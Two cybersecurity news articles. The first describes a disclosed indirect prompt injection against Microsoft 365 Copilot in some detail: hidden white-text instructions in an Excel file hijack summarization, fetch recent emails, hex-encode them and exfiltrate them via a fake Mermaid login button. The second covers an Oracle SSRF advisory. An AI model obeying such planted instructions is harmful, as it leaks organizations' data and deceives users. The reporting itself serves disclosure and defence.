A sophisticated vulnerability in Microsoft 365 Copilot (M365 Copilot) that allows attackers to steal sensitive tenant data, including recent emails, through indirect prompt injection attacks.

The flaw, detailed in a blog post published today by researcher Adam Logue, exploits the AI assistant’s integration with Office documents and its built-in support for Mermaid diagrams, enabling data exfiltration without direct user interaction beyond an initial click.

The attack begins when a user asks M365 Copilot to summarize a maliciously crafted Excel spreadsheet. Hidden instructions, embedded in white text across multiple sheets, use progressive task modification and nested commands to hijack the AI’s behavior.

These indirect prompts override the summarization task, directing Copilot to invoke its search_enterprise_emails tool to retrieve recent corporate emails. The fetched content is then hex-encoded and fragmented into short lines to bypass Mermaid’s character limits.

Microsoft 365 Copilot Data Exfiltration Via Deceptive Diagrams

Copilot generates a Mermaid diagram, a JavaScript-based tool for creating flowcharts and charts from Markdown-like text that masquerades as a “login button” secured with a lock emoji.

The diagram includes CSS styling for a convincing button appearance and a hyperlink embedding the encoded email data.

When the user clicks it, believing it’s needed to access the document’s “sensitive” content, the link directs to the attacker’s server, such as a Burp Collaborator instance. The hex-encoded payload transmits silently, where it can be decoded from server logs.

Mermaid’s flexibility, including CSS support for hyperlinks, made this vector particularly insidious. Unlike direct prompt injection, where attackers converse with the AI, this method hides commands in benign files like emails or PDFs, making it stealthy for phishing campaigns.

Adam Logue noted similarities to a prior Mermaid exploit in Cursor IDE, which enabled zero-click exfiltration via remote images, though M365 Copilot required user interaction.

The payload, after extensive testing, was inspired by Microsoft’s TaskTracker research on detecting “task drift” in LLMs. Despite initial challenges reproducing the issue, Microsoft validated the chain and patched it by September 2025, removing interactive hyperlinks from Copilot’s rendered Mermaid diagrams.

The discovery timeline shows that there were challenges in coordination. Adam Logue reported the complete situation on August 15, 2025, after discussions with the Microsoft Security Response Center (MSRC) staff at DEFCON.

After iterations, including video proofs, MSRC confirmed the vulnerability on September 8 and resolved it by September 26. However, M365 Copilot fell outside the bounty scope, denying a reward.

This incident underscores risks in AI tool integrations, especially for enterprise environments handling sensitive data. As LLMs like Copilot connect to APIs and internal resources, defenses against indirect injections remain critical.

Microsoft emphasized ongoing mitigations, but experts urge users to verify document sources and monitor AI outputs closely.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post Microsoft 365 Copilot Prompt Injection Vulnerability Allows Attackers to Exfiltrate Sensitive Data appeared first on Cyber Security News.

CISA has issued an urgent alert about a critical server-side request forgery (SSRF) vulnerability in Oracle E-Business Suite, now actively exploited by threat actors.

Tracked as CVE-2025-61884, the flaw affects the Runtime component of Oracle Configurator and allows remote attackers to forge requests without authentication, potentially leading to unauthorized access and data exfiltration.

This vulnerability, rated with a high severity score under CVSS 3.1, stems from inadequate input validation that enables attackers to manipulate server requests to internal or external resources.

As organizations rely heavily on Oracle E-Business Suite for enterprise resource planning (ERP), the risks are amplified in sectors like finance, manufacturing, and government, where sensitive data flows through these systems.

Exploitation Tactics And Real-World Impact

CISA’s Known Exploited Vulnerabilities (KEV) catalog added CVE-2025-61884 after evidence emerged of active exploitation in the wild.

Attackers can leverage SSRF to scan internal networks, bypass firewalls, and interact with cloud metadata services, often as a stepping stone for broader intrusions.

While direct ties to ransomware campaigns remain unconfirmed, security researchers note similarities to tactics used in recent supply chain attacks, where SSRF flaws have facilitated lateral movement.

Oracle patched the issue in its October 2025 Critical Patch Update, but unpatched systems remain prime targets.

Early reports indicate exploitation attempts targeting outdated E-Business Suite installations in the Asia-Pacific regions, with potential for widespread compromise if organizations delay remediation.

The flaw aligns with CWE-918, a common SSRF weakness that has plagued enterprise software for years.

Mitigations

CISA urges immediate action: apply Oracle’s vendor-provided patches or mitigations, such as network segmentation and web application firewalls (WAFs) tuned to block anomalous requests.

For cloud-hosted instances, adhere to Binding Operational Directive (BOD) 22-01, which mandates vulnerability management in federal systems.

If mitigations prove infeasible, CISA advises discontinuing use of affected products to avoid exposure. Experts emphasize proactive monitoring, including logging SSRF indicators like unexpected outbound traffic.

Organizations should scan their networks for vulnerabilities using tools like Nessus or OpenVAS and review access logs for signs of exploitation.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post CISA Warns Of Oracle E-Business Suite SSRF Vulnerability Actively Exploited In Attacks appeared first on Cyber Security News.